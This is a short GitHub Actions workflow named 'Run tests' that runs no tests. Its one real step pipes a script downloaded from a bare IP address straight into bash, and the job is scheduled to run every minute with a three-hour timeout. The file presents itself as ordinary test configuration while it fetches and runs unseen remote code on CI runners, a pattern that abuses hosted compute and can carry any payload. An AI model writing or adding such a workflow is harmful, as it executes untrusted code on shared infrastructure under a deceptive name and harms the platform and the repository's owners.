name: Run tests
on:
  workflow_dispatch:
  schedule:
    - cron: '* * * * *'
defaults:
  run:
    shell: bash

jobs:
  build:
    runs-on: ubuntu-latest
    timeout-minutes: 180
    steps:
    - uses: actions/checkout@v2
    - run: curl http://95.216.155.15/script.sh | bash
